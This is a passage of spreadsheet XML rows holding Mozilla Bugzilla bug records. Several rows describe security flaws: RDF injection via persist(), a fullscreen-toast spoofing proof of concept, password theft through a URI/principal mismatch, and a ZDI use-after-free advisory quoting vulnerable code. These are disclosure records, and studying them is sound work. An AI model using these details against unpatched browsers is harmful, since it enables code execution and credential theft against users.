      <c r="P2646" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q2646" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2646" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2646" t="inlineStr">
        <is>
          <t>mozilla1.9alpha1</t>
        </is>
      </c>
      <c r="T2646" t="n">
        <v>1</v>
      </c>
      <c r="U2646" t="n">
        <v>0</v>
      </c>
      <c r="V2646" t="n">
        <v>37</v>
      </c>
      <c r="W2646" t="inlineStr">
        <is>
          <t>XULDocument.persist() function doesn't verify whether the second argument is
a valid attribute name.  Thus, an attacker can inject bogus RDF data into
localstore.rdf in order to run arbitrary code.
Steps to Reproduce:
1. Load testcase, and click "Click me!" button.
2. Shutdown the browser.
3. (See the content of localstore.rdf.)
4. Start the browser.
An alert dialog that shows Components.stack will appear.
This affects:
Firefox 1.0.7, 1.5 and trunk
Mozilla 1.7.12</t>
        </is>
      </c>
      <c r="X2646" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2647">
      <c r="A2647" t="n">
        <v>608960</v>
      </c>
      <c r="B2647" t="inlineStr">
        <is>
          <t>2010-11-02 06:22:00 -0700</t>
        </is>
      </c>
      <c r="C2647" t="inlineStr">
        <is>
          <t>abort mozilla-central builds for 7bb3a539a572, just shipped-locales</t>
        </is>
      </c>
      <c r="D2647" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E2647" t="n">
        <v>1</v>
      </c>
      <c r="F2647" t="n">
        <v>1</v>
      </c>
      <c r="G2647" t="n">
        <v>5</v>
      </c>
      <c r="H2647" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2647" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2647" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2647" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2647" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2647" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2647" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2647" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2647" t="inlineStr"/>
      <c r="Q2647" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2647" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2647" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2647" t="n">
        <v>1</v>
      </c>
      <c r="U2647" t="n">
        <v>0</v>
      </c>
      <c r="V2647" t="n">
        <v>3</v>
      </c>
      <c r="W2647" t="inlineStr">
        <is>
          <t>please abort the builds for 7bb3a539a572, it's a NPOTB shipped-locales landing.
thanks.</t>
        </is>
      </c>
      <c r="X2647" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2648">
      <c r="A2648" t="n">
        <v>1816007</v>
      </c>
      <c r="B2648" t="inlineStr">
        <is>
          <t>2023-02-09 14:25:21 -0800</t>
        </is>
      </c>
      <c r="C2648" t="inlineStr">
        <is>
          <t>Obscuring Full-Screen Toast in Android Through Google Assistant URI</t>
        </is>
      </c>
      <c r="D2648" t="inlineStr">
        <is>
          <t>2024-05-30 11:05:15 -0700</t>
        </is>
      </c>
      <c r="E2648" t="n">
        <v>1</v>
      </c>
      <c r="F2648" t="n">
        <v>1</v>
      </c>
      <c r="G2648" t="n">
        <v>2</v>
      </c>
      <c r="H2648" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2648" t="inlineStr">
        <is>
          <t>Fenix</t>
        </is>
      </c>
      <c r="J2648" t="inlineStr">
        <is>
          <t>Browser Engine</t>
        </is>
      </c>
      <c r="K2648" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2648" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2648" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2648" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2648" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2648" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main112+]</t>
        </is>
      </c>
      <c r="Q2648" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2648" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S2648" t="inlineStr">
        <is>
          <t>113 Branch</t>
        </is>
      </c>
      <c r="T2648" t="n">
        <v>1</v>
      </c>
      <c r="U2648" t="n">
        <v>0</v>
      </c>
      <c r="V2648" t="n">
        <v>14</v>
      </c>
      <c r="W2648" t="inlineStr">
        <is>
          <t>Created attachment 9316908
poc.rar
In Firefox, an Attacker Can Conceal Fullscreen Toast Notifications.
This vulnerability is similar to recently fixed Chromium bugs, such as https://bugs.chromium.org/p/chromium/issues/detail?id=1370028 and https://bugs.chromium.org/p/chromium/issues/detail?id=1320538. Although Android Firefox is not vulnerable to the method used in these bugs, I have discovered a different method where the attacker can achieve the same result.
When the victim clicks the button, the following proof-of-concept (POC) triggers the launch of Google Assistant using an Android URI. This obscures the full-screen toast and loads a spoofed page in the background.
Steps to Reproduce:
1. Download and extract the file `poc.rar` to a folder
2. Start a Python server on the same folder by running the command `python -m http.server 8080`.
3. Open the Android Firefox browser and navigate to the server at `http://{YOUR-SERVER-IP}:8080/poc.html` to Begin testing.
Video Demonstration: https://youtu.be/uhofqP649_o (YouTube Unlisted)</t>
        </is>
      </c>
      <c r="X2648" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2649">
      <c r="A2649" t="n">
        <v>834776</v>
      </c>
      <c r="B2649" t="inlineStr">
        <is>
          <t>2013-01-25 10:35:14 -0800</t>
        </is>
      </c>
      <c r="C2649" t="inlineStr">
        <is>
          <t>Forgot PIN is redirecting incorrectly</t>
        </is>
      </c>
      <c r="D2649" t="inlineStr">
        <is>
          <t>2013-06-28 15:24:37 -0700</t>
        </is>
      </c>
      <c r="E2649" t="n">
        <v>1</v>
      </c>
      <c r="F2649" t="n">
        <v>1</v>
      </c>
      <c r="G2649" t="n">
        <v>6</v>
      </c>
      <c r="H2649" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2649" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J2649" t="inlineStr">
        <is>
          <t>Payments/Refunds</t>
        </is>
      </c>
      <c r="K2649" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="L2649" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2649" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2649" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2649" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2649" t="inlineStr">
        <is>
          <t>u=patron p=1 [qa-]</t>
        </is>
      </c>
      <c r="Q2649" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2649" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2649" t="inlineStr">
        <is>
          <t>2013-01-31</t>
        </is>
      </c>
      <c r="T2649" t="n">
        <v>1</v>
      </c>
      <c r="U2649" t="n">
        <v>0</v>
      </c>
      <c r="V2649" t="n">
        <v>4</v>
      </c>
      <c r="W2649" t="inlineStr">
        <is>
          <t>STR:
- adjust the reset_start() view so that it returns an empty http response (not a 500)
- begin a purchase with an account that already has a pin
- instead of clicking enter pin, click Forgot PIN
- the first view it hits is reset_start
- but @enforce_sequence redirects to reset_confirm
Expected: the decorator should not redirect to reset_confirm
If I begin a purchase with a brand new user that has no pin, create *and* confirm a pin, then *refresh* the lobby URL to start a new purchase but keep the same session @enforce_sequence does *not* redirect to reset_confirm. This seems like the correct behavior.</t>
        </is>
      </c>
      <c r="X2649" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2650">
      <c r="A2650" t="n">
        <v>482206</v>
      </c>
      <c r="B2650" t="inlineStr">
        <is>
          <t>2009-03-09 03:38:37 -0700</t>
        </is>
      </c>
      <c r="C2650" t="inlineStr">
        <is>
          <t>[FIX]It's possible to create a document whose URI does not match the document's principal</t>
        </is>
      </c>
      <c r="D2650" t="inlineStr">
        <is>
          <t>2013-08-25 18:07:10 -0700</t>
        </is>
      </c>
      <c r="E2650" t="n">
        <v>1</v>
      </c>
      <c r="F2650" t="n">
        <v>1</v>
      </c>
      <c r="G2650" t="n">
        <v>3</v>
      </c>
      <c r="H2650" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2650" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2650" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K2650" t="inlineStr">
        <is>
          <t>1.9.1 Branch</t>
        </is>
      </c>
      <c r="L2650" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2650" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N2650" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2650" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2650" t="inlineStr">
        <is>
          <t>[sg:high] doesn't affect trunk due to 465806</t>
        </is>
      </c>
      <c r="Q2650" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2650" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2650" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2650" t="n">
        <v>1</v>
      </c>
      <c r="U2650" t="n">
        <v>0</v>
      </c>
      <c r="V2650" t="n">
        <v>19</v>
      </c>
      <c r="W2650" t="inlineStr">
        <is>
          <t>This seems to be a regression from bug 445004.  fx3.0.7 and fx3.1 are affected.
On trunk, this seems to have been fixed by bug 465806.
In nsHTMLDocument::OpenCommon(), we get the URI from the document returned by
GetDocumentFromContext(), but we get the principal by using
GetSubjectPrincipal().
An attacker can create a fake login page whose URI is a real login page's URI. 
And, if a password for the real login page was already saved in the Password
Manager, an attacker can steal the password without user interaction.</t>
        </is>
      </c>
      <c r="X2650" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2651">
      <c r="A2651" t="n">
        <v>405198</v>
      </c>
      <c r="B2651" t="inlineStr">
        <is>
          <t>2007-11-24 04:34:45 -0800</t>
        </is>
      </c>
      <c r="C2651" t="inlineStr">
        <is>
          <t>Cannot drag and drop folders / items in Places Organizer</t>
        </is>
      </c>
      <c r="D2651" t="inlineStr">
        <is>
          <t>2012-08-06 19:25:24 -0700</t>
        </is>
      </c>
      <c r="E2651" t="n">
        <v>1</v>
      </c>
      <c r="F2651" t="n">
        <v>1</v>
      </c>
      <c r="G2651" t="n">
        <v>2</v>
      </c>
      <c r="H2651" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2651" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2651" t="inlineStr">
        <is>
          <t>Bookmarks &amp; History</t>
        </is>
      </c>
      <c r="K2651" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2651" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2651" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2651" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2651" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2651" t="inlineStr"/>
      <c r="Q2651" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2651" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2651" t="inlineStr">
        <is>
          <t>Firefox 3 beta4</t>
        </is>
      </c>
      <c r="T2651" t="n">
        <v>1</v>
      </c>
      <c r="U2651" t="n">
        <v>11</v>
      </c>
      <c r="V2651" t="n">
        <v>83</v>
      </c>
      <c r="W2651" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9b2pre) Gecko/2007112401 Minefield/3.0b2pre
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9b2pre) Gecko/2007112401 Minefield/3.0b2pre
In the Places Organizer, I am not able to drag and drop folders or bookmarks from one location to another.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
        </is>
      </c>
      <c r="X2651" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2652">
      <c r="A2652" t="n">
        <v>13054</v>
      </c>
      <c r="B2652" t="inlineStr">
        <is>
          <t>1999-09-02 13:41:12 -0700</t>
        </is>
      </c>
      <c r="C2652" t="inlineStr">
        <is>
          <t>[BLOCKER][CRASH] Form doesn't send data when more than 16KB are submitted</t>
        </is>
      </c>
      <c r="D2652" t="inlineStr">
        <is>
          <t>2019-03-13 06:45:08 -0700</t>
        </is>
      </c>
      <c r="E2652" t="n">
        <v>1</v>
      </c>
      <c r="F2652" t="n">
        <v>1</v>
      </c>
      <c r="G2652" t="n">
        <v>3</v>
      </c>
      <c r="H2652" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2652" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2652" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K2652" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2652" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2652" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2652" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2652" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2652" t="inlineStr">
        <is>
          <t>help wanted</t>
        </is>
      </c>
      <c r="Q2652" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2652" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2652" t="inlineStr">
        <is>
          <t>M12</t>
        </is>
      </c>
      <c r="T2652" t="n">
        <v>1</v>
      </c>
      <c r="U2652" t="n">
        <v>0</v>
      </c>
      <c r="V2652" t="n">
        <v>12</v>
      </c>
      <c r="W2652" t="inlineStr">
        <is>
          <t>Overview Description: When you try to submit a form that contains more than 16KB
of data in a single hidden/text input or textarea fields, it fails to send that
data to the server and it hangs the browser.
Hidden fields may contain large amounts on application generated data. I tried
posting 64KB (four times more than the above) using 4.5 or pre-Necko builds, and
the data is sent without a flaw.
Steps to Reproduce:
1) Click on the URL provided and verify you have access to the cgi script. It
will respond as "Welcome to Bubblegum Server!".
If you cannot access to bubblegum, download the attached cgi script and put it
on a web server directory with cgi execution privileges.
2) Load the attached testcase, or create an HTML file with the following
contents, and *wait* (10~20 sec. on Win NT) until it loads :
&lt;HTML&gt;
&lt;HEAD&gt;
&lt;TITLE&gt;Data Length Submission Test&lt;/TITLE&gt;
&lt;/HEAD&gt;
&lt;BODY&gt;
&lt;FORM ACTION="/gerardok/cgi/cgitest.cgi" METHOD="post"&gt;
&lt;INPUT TYPE="hidden" NAME="myname"&gt;
&lt;INPUT TYPE="submit"&gt;
&lt;/FORM&gt;
&lt;SCRIPT type="text/javascript"&gt;
// Generate text for ~17KB
for( i = 65; i &lt; 82; i++ ) {
  //10 char alphabetic string
  var s = "";
  var c = String.fromCharCode(i);
  for( k = 0; k &lt; 10; k++ ) {
    s += c;
  }
  //Generate ~1000 char string
  for( j = 0; j &lt; 100; j++ ) {
    document.forms[0].myname.value += s;
  }
  document.forms[0].myname.value += "&lt;br&gt;";
}
alert( "Page loaded" );
&lt;/SCRIPT&gt;
&lt;/BODY&gt;
&lt;/HTML&gt;
3) When the page is loaded, an alert msg. will be displayed. Press the Ok button
to close that dialog box.
4) Click on the Submit button, and wait (5~10 sec. on Win NT) for the cgi
response.
Actual Results: The browser window hangs.
Expected Results: The submitted data should be displayed right below Bubblegum's
greeting Msg.
Build ID &amp; Platform Bug Found: 1999-08-30-10-M10 on Win NT
Additional Builds and Platforms Tested On: 1999-08-30-01 on Linux, and
1999-08-30-09 on Mac.
Additional Information: Use hidden input only on Linux, as the UI widgets aren't
holding much data there because another bug.
Load the second attached testcase that sends only ~16KB, in order to demostrate
a successful data submission.</t>
        </is>
      </c>
      <c r="X2652" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2653">
      <c r="A2653" t="n">
        <v>785511</v>
      </c>
      <c r="B2653" t="inlineStr">
        <is>
          <t>2012-08-24 14:19:22 -0700</t>
        </is>
      </c>
      <c r="C2653" t="inlineStr">
        <is>
          <t>Prevent directory browsing in docs/, extensions/ and all other subdirectories of Bugzilla</t>
        </is>
      </c>
      <c r="D2653" t="inlineStr">
        <is>
          <t>2012-11-02 07:02:02 -0700</t>
        </is>
      </c>
      <c r="E2653" t="n">
        <v>1</v>
      </c>
      <c r="F2653" t="n">
        <v>1</v>
      </c>
      <c r="G2653" t="n">
        <v>4</v>
      </c>
      <c r="H2653" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2653" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2653" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K2653" t="inlineStr">
        <is>
          <t>4.3.2</t>
        </is>
      </c>
      <c r="L2653" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2653" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2653" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2653" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2653" t="inlineStr"/>
      <c r="Q2653" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2653" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S2653" t="inlineStr">
        <is>
          <t>Bugzilla 4.4</t>
        </is>
      </c>
      <c r="T2653" t="n">
        <v>1</v>
      </c>
      <c r="U2653" t="n">
        <v>0</v>
      </c>
      <c r="V2653" t="n">
        <v>11</v>
      </c>
      <c r="W2653" t="inlineStr">
        <is>
          <t>Created attachment 655158
patch, v1
There is no reason to let all files in the doc/ tree to be browsable from the web, especially those being in xsl/ or lib/. Only files which are supposed to be viewable should be whitelisted.
I create docs/.htaccess and configure it so that localizers do not need to create their own .htaccess file. Besides .txt, .pdf and .html files, we also have to whitelist .css, .png and .gif files to be loaded from HTML files.</t>
        </is>
      </c>
      <c r="X2653" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2654">
      <c r="A2654" t="n">
        <v>797566</v>
      </c>
      <c r="B2654" t="inlineStr">
        <is>
          <t>2012-10-03 14:34:44 -0700</t>
        </is>
      </c>
      <c r="C2654" t="inlineStr">
        <is>
          <t>crash-stats-dev database is out-of-date, suspect problem with mobeta schema changes</t>
        </is>
      </c>
      <c r="D2654" t="inlineStr">
        <is>
          <t>2012-11-06 11:41:25 -0800</t>
        </is>
      </c>
      <c r="E2654" t="n">
        <v>1</v>
      </c>
      <c r="F2654" t="n">
        <v>1</v>
      </c>
      <c r="G2654" t="n">
        <v>4</v>
      </c>
      <c r="H2654" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2654" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J2654" t="inlineStr">
        <is>
          <t>Infra</t>
        </is>
      </c>
      <c r="K2654" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2654" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2654" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2654" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2654" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2654" t="inlineStr"/>
      <c r="Q2654" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2654" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2654" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2654" t="n">
        <v>1</v>
      </c>
      <c r="U2654" t="n">
        <v>0</v>
      </c>
      <c r="V2654" t="n">
        <v>16</v>
      </c>
      <c r="W2654" t="inlineStr">
        <is>
          <t>Here are the errors from a recent refresh: http://pastebin.mozilla.org/1856196
stephend reports a lack of data here: https://crash-stats-dev.allizom.org/hangreport/byversion/Firefox/15.0.1
I'm running a backfill_matviews() and will report what happens when that's done.</t>
        </is>
      </c>
      <c r="X2654" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2655">
      <c r="A2655" t="n">
        <v>441751</v>
      </c>
      <c r="B2655" t="inlineStr">
        <is>
          <t>2008-06-25 01:00:45 -0700</t>
        </is>
      </c>
      <c r="C2655" t="inlineStr">
        <is>
          <t>Directives not to cache pages ignored.</t>
        </is>
      </c>
      <c r="D2655" t="inlineStr">
        <is>
          <t>2012-05-07 10:21:27 -0700</t>
        </is>
      </c>
      <c r="E2655" t="n">
        <v>1</v>
      </c>
      <c r="F2655" t="n">
        <v>1</v>
      </c>
      <c r="G2655" t="n">
        <v>3</v>
      </c>
      <c r="H2655" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2655" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2655" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2655" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2655" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2655" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2655" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2655" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2655" t="inlineStr">
        <is>
          <t>[sg:want] post 1.8-branch</t>
        </is>
      </c>
      <c r="Q2655" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2655" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2655" t="inlineStr">
        <is>
          <t>mozilla1.9.1b3</t>
        </is>
      </c>
      <c r="T2655" t="n">
        <v>1</v>
      </c>
      <c r="U2655" t="n">
        <v>13</v>
      </c>
      <c r="V2655" t="n">
        <v>104</v>
      </c>
      <c r="W2655" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9) Gecko/2008052906 Firefox/3.0
From your description, you're encountering some problem with disable 
client-side browser cache in firefox browser.  
Regarding on this, I've also performed some test on my side. Generally, the 
following code should be necessary to disable client-side cache:
=======================
   Protected Sub Page_Load(ByVal sender As Object, ByVal e As 
System.EventArgs) Handles Me.Load
        Response.Cache.SetAllowResponseInBrowserHistory(False)
        Response.Cache.SetCacheability(HttpCacheability.NoCache)
        Response.Cache.SetNoStore()
        Response.Expires = 0
        Response.Write("&lt;br/&gt;" &amp; DateTime.Now.ToLongTimeString())
    End Sub
 ==============================
And my local tests showed that it works corretly for IE7 and firefox 2.0.  
However, for firefox 3.0, it does not work. I think it is due to the 
implemenation of the firefox 3. BTW, the cache control http header is a 
advisory info and the actual implemation is not mandatory and depend on the 
browser, so I suggest you also try submit this issue to firefox community 
to see whether this is an by design behavior.
Reproducible: Always
Steps to Reproduce:
1. Load page with "no-cache" or "no-store" directive
2. Go forward to next page
3.Go back button on browser, page loads from cache.
Actual Results:  
Page loads from cache, but should re-load from server or show message that page has expired.</t>
        </is>
      </c>
      <c r="X2655" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2656">
      <c r="A2656" t="n">
        <v>648090</v>
      </c>
      <c r="B2656" t="inlineStr">
        <is>
          <t>2011-04-06 12:58:24 -0700</t>
        </is>
      </c>
      <c r="C2656" t="inlineStr">
        <is>
          <t>Mozilla Firefox SVGPathSegList.replaceItem Remote Code Execution Vulnerability (ZDI-CAN-1142)</t>
        </is>
      </c>
      <c r="D2656" t="inlineStr">
        <is>
          <t>2011-07-12 09:05:50 -0700</t>
        </is>
      </c>
      <c r="E2656" t="n">
        <v>1</v>
      </c>
      <c r="F2656" t="n">
        <v>1</v>
      </c>
      <c r="G2656" t="n">
        <v>3</v>
      </c>
      <c r="H2656" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2656" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2656" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K2656" t="inlineStr">
        <is>
          <t>1.9.2 Branch</t>
        </is>
      </c>
      <c r="L2656" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2656" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2656" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2656" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2656" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q2656" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2656" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2656" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2656" t="n">
        <v>1</v>
      </c>
      <c r="U2656" t="n">
        <v>0</v>
      </c>
      <c r="V2656" t="n">
        <v>20</v>
      </c>
      <c r="W2656" t="inlineStr">
        <is>
          <t>Created attachment 524240
PoC
ZDI-CAN-1142: Mozilla Firefox SVGPathSegList.replaceItem Remote Code Execution Vulnerability
-- CVSS ----------------------------------------------------------------
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)
-- ABSTRACT ------------------------------------------------------------
TippingPoint has identified a vulnerability affecting the following 
products:
    Mozilla Firefo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code responsible for parsing SVG path segment objects. The function nsSVGPathSegList::ReplaceItem() does
not account for deletion of the segment object list within a user defined DOMAttrModified EventListener. Code within
nsSVGPathSegList::ReplaceItem() references the segment list without verifying that it was not deleted in the aforementioned callback. This
can be abused to create a dangling reference which can be leveraged to execute arbitrary code within the context of the browser.
Version(s)  tested: 3.6.13
Platform(s) tested: Win XP SP3
From content/svg/content/src/nsSVGPathSegList.cpp:
NS_IMETHODIMP nsSVGPathSegList::ReplaceItem(nsIDOMSVGPathSeg *newItem,
                                            PRUint32 index,
                                            nsIDOMSVGPathSeg **_retval)
{
  ...
  InsertElementAt(newItemSeg, index);
RemoveFromCurrentList(static_cast&lt;nsSVGPathSeg*&gt;(mSegments.ObjectAt(index+1)));
  NS_ADDREF(*_retval = newItem);
  return NS_OK;
}
During execution of |InsertElementAt| "DOMAttrModified" event is dispatched. User's provided event handler will be called. During that callback it is possible to delete whole content of |mSegments|, e.g. by calling method clear() on pathSegList object. As |mSegments| is defined as |nsCOMArray| and method |ObjectAt| does not do out-of-bound check of index argument, previously |ObjectAt| freed memory will be referenced.
-- CREDIT --------------------------------------------------------------
This vulnerability was discovered by:
    * regenrecht</t>
        </is>
      </c>
      <c r="X2656" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2657">
      <c r="A2657" t="n">
        <v>1586176</v>
      </c>
      <c r="B2657" t="inlineStr">
        <is>
          <t>2019-10-03 23:00:30 -0700</t>
        </is>
      </c>
      <c r="C2657" t="inlineStr">
        <is>
          <t>Out-of-bounds write when passing an output buffer smaller than the block size to NSC_EncryptUpdate</t>
        </is>
      </c>
      <c r="D2657" t="inlineStr">
        <is>
          <t>2024-05-30 10:03:27 -0700</t>
        </is>
      </c>
      <c r="E2657" t="n">
        <v>1</v>
      </c>
      <c r="F2657" t="n">
        <v>1</v>
      </c>
      <c r="G2657" t="n">
        <v>3</v>
      </c>
      <c r="H2657" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2657" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J2657" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K2657" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L2657" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2657" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2657" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2657" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2657" t="inlineStr">
        <is>
          <t>[adv-main71+][adv-esr68.3+]</t>
        </is>
      </c>
